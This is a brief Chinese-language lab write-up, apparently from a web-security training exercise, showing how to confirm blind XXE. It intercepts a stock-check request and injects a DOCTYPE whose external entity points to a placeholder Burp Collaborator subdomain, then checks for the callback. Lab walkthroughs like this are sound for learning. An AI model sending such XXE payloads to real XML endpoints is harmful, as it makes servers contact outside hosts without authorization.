XXE Lab3 - HackMD

# XXE Lab3 這題 Blind XXE（盲注XXE），因為後端不直接回顯結果，我們只能用「外部互動」來判斷 XXE 是否成功觸發。一樣進入網站並攔截請求。 ![image](https://hackmd.io/_uploads/S1TEv47Hlx.png) ![image](https://hackmd.io/_uploads/Hy7dDE7Blx.png) 接著修改請求，填入我們的子網域。 ``` <!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://YOUR-BURP-COLLABORATOR-SUBDOMAIN"> ]> ``` ![image](https://hackmd.io/_uploads/HJSEC4Xrxe.png) 這表示 XXE 成功觸發，後端嘗試從你控制的 Collaborator 伺服器讀資源。 ![image](https://hackmd.io/_uploads/H1g9CN7reg.png) ---